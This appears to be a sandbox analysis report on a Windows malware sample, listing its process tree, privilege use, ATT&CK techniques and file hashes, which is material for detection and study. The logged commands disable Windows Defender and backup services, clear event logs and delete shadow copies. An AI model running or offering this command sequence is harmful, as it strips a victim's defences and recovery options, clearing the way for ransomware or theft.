description pid Process Token: SeSecurityPrivilege 3464 wevtutil.exe Token: SeBackupPrivilege 3464 wevtutil.exe Token: SeSecurityPrivilege 3688 wevtutil.exe Token: SeBackupPrivilege 3688 wevtutil.exe Token: SeSecurityPrivilege 4736 wevtutil.exe Token: SeBackupPrivilege 4736 wevtutil.exe Token: SeIncreaseQuotaPrivilege 116 wmic.exe Token: SeSecurityPrivilege 116 wmic.exe Token: SeTakeOwnershipPrivilege 116 wmic.exe Token: SeLoadDriverPrivilege 116 wmic.exe Token: SeSystemProfilePrivilege 116 wmic.exe Token: SeSystemtimePrivilege 116 wmic.exe Token: SeProfSingleProcessPrivilege 116 wmic.exe Token: SeIncBasePriorityPrivilege 116 wmic.exe Token: SeCreatePagefilePrivilege 116 wmic.exe Token: SeBackupPrivilege 116 wmic.exe Token: SeRestorePrivilege 116 wmic.exe Token: SeShutdownPrivilege 116 wmic.exe Token: SeDebugPrivilege 116 wmic.exe Token: SeSystemEnvironmentPrivilege 116 wmic.exe Token: SeRemoteShutdownPrivilege 116 wmic.exe Token: SeUndockPrivilege 116 wmic.exe Token: SeManageVolumePrivilege 116 wmic.exe Token: 33 116 wmic.exe Token: 34 116 wmic.exe Token: 35 116 wmic.exe Token: 36 116 wmic.exe Token: SeIncreaseQuotaPrivilege 4272 wmic.exe Token: SeSecurityPrivilege 4272 wmic.exe Token: SeTakeOwnershipPrivilege 4272 wmic.exe Token: SeLoadDriverPrivilege 4272 wmic.exe Token: SeSystemProfilePrivilege 4272 wmic.exe Token: SeSystemtimePrivilege 4272 wmic.exe Token: SeProfSingleProcessPrivilege 4272 wmic.exe Token: SeIncBasePriorityPrivilege 4272 wmic.exe Token: SeCreatePagefilePrivilege 4272 wmic.exe Token: SeBackupPrivilege 4272 wmic.exe Token: SeRestorePrivilege 4272 wmic.exe Token: SeShutdownPrivilege 4272 wmic.exe Token: SeDebugPrivilege 4272 wmic.exe Token: SeSystemEnvironmentPrivilege 4272 wmic.exe Token: SeRemoteShutdownPrivilege 4272 wmic.exe Token: SeUndockPrivilege 4272 wmic.exe Token: SeManageVolumePrivilege 4272 wmic.exe Token: 33 4272 wmic.exe Token: 34 4272 wmic.exe Token: 35 4272 wmic.exe Token: 36 4272 wmic.exe Token: SeIncreaseQuotaPrivilege 4272 wmic.exe Token: SeSecurityPrivilege 4272 wmic.exe Token: SeTakeOwnershipPrivilege 4272 wmic.exe Token: SeLoadDriverPrivilege 4272 wmic.exe Token: SeSystemProfilePrivilege 4272 wmic.exe Token: SeSystemtimePrivilege 4272 wmic.exe Token: SeProfSingleProcessPrivilege 4272 wmic.exe Token: SeIncBasePriorityPrivilege 4272 wmic.exe Token: SeCreatePagefilePrivilege 4272 wmic.exe Token: SeBackupPrivilege 4272 wmic.exe Token: SeRestorePrivilege 4272 wmic.exe Token: SeShutdownPrivilege 4272 wmic.exe Token: SeDebugPrivilege 4272 wmic.exe Token: SeSystemEnvironmentPrivilege 4272 wmic.exe Token: SeRemoteShutdownPrivilege 4272 wmic.exe Token: SeUndockPrivilege 4272 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4648 wrote to memory of 2368 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 90 PID 4648 wrote to memory of 2368 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 90 PID 4648 wrote to memory of 2368 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 90 PID 2368 wrote to memory of 2136 2368 net.exe 140 PID 2368 wrote to memory of 2136 2368 net.exe 140 PID 2368 wrote to memory of 2136 2368 net.exe 140 PID 4648 wrote to memory of 4544 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 93 PID 4648 wrote to memory of 4544 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 93 PID 4648 wrote to memory of 4544 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 93 PID 4544 wrote to memory of 1692 4544 net.exe 95 PID 4544 wrote to memory of 1692 4544 net.exe 95 PID 4544 wrote to memory of 1692 4544 net.exe 95 PID 4648 wrote to memory of 5092 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 96 PID 4648 wrote to memory of 5092 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 96 PID 4648 wrote to memory of 5092 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 96 PID 5092 wrote to memory of 556 5092 net.exe 98 PID 5092 wrote to memory of 556 5092 net.exe 98 PID 5092 wrote to memory of 556 5092 net.exe 98 PID 4648 wrote to memory of 4732 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 101 PID 4648 wrote to memory of 4732 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 101 PID 4648 wrote to memory of 4732 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 101 PID 4732 wrote to memory of 4068 4732 net.exe 103 PID 4732 wrote to memory of 4068 4732 net.exe 103 PID 4732 wrote to memory of 4068 4732 net.exe 103 PID 4648 wrote to memory of 3156 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 104 PID 4648 wrote to memory of 3156 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 104 PID 4648 wrote to memory of 3156 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 104 PID 3156 wrote to memory of 1760 3156 net.exe 106 PID 3156 wrote to memory of 1760 3156 net.exe 106 PID 3156 wrote to memory of 1760 3156 net.exe 106 PID 4648 wrote to memory of 2132 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 107 PID 4648 wrote to memory of 2132 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 107 PID 4648 wrote to memory of 2132 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 107 PID 2132 wrote to memory of 4324 2132 net.exe 109 PID 2132 wrote to memory of 4324 2132 net.exe 109 PID 2132 wrote to memory of 4324 2132 net.exe 109 PID 4648 wrote to memory of 1552 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 110 PID 4648 wrote to memory of 1552 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 110 PID 4648 wrote to memory of 1552 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 110 PID 1552 wrote to memory of 1784 1552 net.exe 113 PID 1552 wrote to memory of 1784 1552 net.exe 113 PID 1552 wrote to memory of 1784 1552 net.exe 113 PID 4648 wrote to memory of 2536 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 114 PID 4648 wrote to memory of 2536 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 114 PID 4648 wrote to memory of 2536 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 114 PID 2536 wrote to memory of 868 2536 net.exe 116 PID 2536 wrote to memory of 868 2536 net.exe 116 PID 2536 wrote to memory of 868 2536 net.exe 116 PID 4648 wrote to memory of 4092 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 117 PID 4648 wrote to memory of 4092 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 117 PID 4648 wrote to memory of 4092 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 117 PID 4648 wrote to memory of 4712 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 119 PID 4648 wrote to memory of 4712 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 119 PID 4648 wrote to memory of 4712 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 119 PID 4648 wrote to memory of 1524 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 121 PID 4648 wrote to memory of 1524 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 121 PID 4648 wrote to memory of 1524 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 121 PID 4648 wrote to memory of 4480 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 123 PID 4648 wrote to memory of 4480 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 123 PID 4648 wrote to memory of 4480 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 123 PID 4648 wrote to memory of 976 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 125 PID 4648 wrote to memory of 976 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 125 PID 4648 wrote to memory of 976 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 125 PID 4648 wrote to memory of 3096 4648 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 127
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵
- System Location Discovery: System Language Discovery
PID:2136
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵
- System Location Discovery: System Language Discovery
PID:1692
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵
- System Location Discovery: System Language Discovery
PID:556
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵
- System Location Discovery: System Language Discovery
PID:4068
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵
- System Location Discovery: System Language Discovery
PID:1760
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵
- System Location Discovery: System Language Discovery
PID:4324
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵
- System Location Discovery: System Language Discovery
PID:1784
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_2a3af" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_2a3af" /y3⤵
- System Location Discovery: System Language Discovery
PID:868
-
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4092
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4712
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:1524
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4480
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:976
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3096
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:8
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_2a3af" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1756
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:216
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:2340
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
- System Location Discovery: System Language Discovery
PID:2556
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:808 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2136
-
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:4152
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:4548
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1064
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4804
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2228
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3520
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:760
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2784
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:3972
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:2932
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:3420
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:2412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:2956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:4940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:1972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:4248
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:2136
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:2836
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵
- System Location Discovery: System Language Discovery
PID:3484
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:1556
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:3556
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:1432
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:4256
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1152
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:448
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:3952
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:2592
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:5032
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:116
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4272
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵
- System Location Discovery: System Language Discovery
PID:2144
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2056
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- System Location Discovery: System Language Discovery
PID:4800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1640
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Defense Evasion
Impair Defenses
3Disable or Modify Tools
2Indicator Removal
2Clear Windows Event Logs
1File Deletion
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51baa273d4db8d917553db9f7f30cfa1e
SHA1c6e9e81aeb6e1b75317874b79a0b94ecdf235bf6
SHA256df70bc8ecc225eba78e05789f7922efd830321899b700d9770d385f10bbfbf79
SHA512798efefc754d9c031066e050155f8cae2f82c585ef2b8725807ff72e58cf4ac0ef13419e4a623bb3d1d1cf34bd6b89420bdf1de066acc8b833a7110cdfbf62ec
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD52250cb5867e0da30a66677596aabce91
SHA1e2a64366d7e5334d7949acabcb5266dde792fc2c
SHA2567e92eb806ad2c63d5d6bb259197e126455c3b815f9e4223c94cf0ca0a5b774da
SHA512bad2fff072120249cc30ba39895d2af5985f61b63941bbb84b77850583327621d1cbab926d76e2adde0d4b7caeaf8a8fca7be8745cd5fa50c4887aa72e062056
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82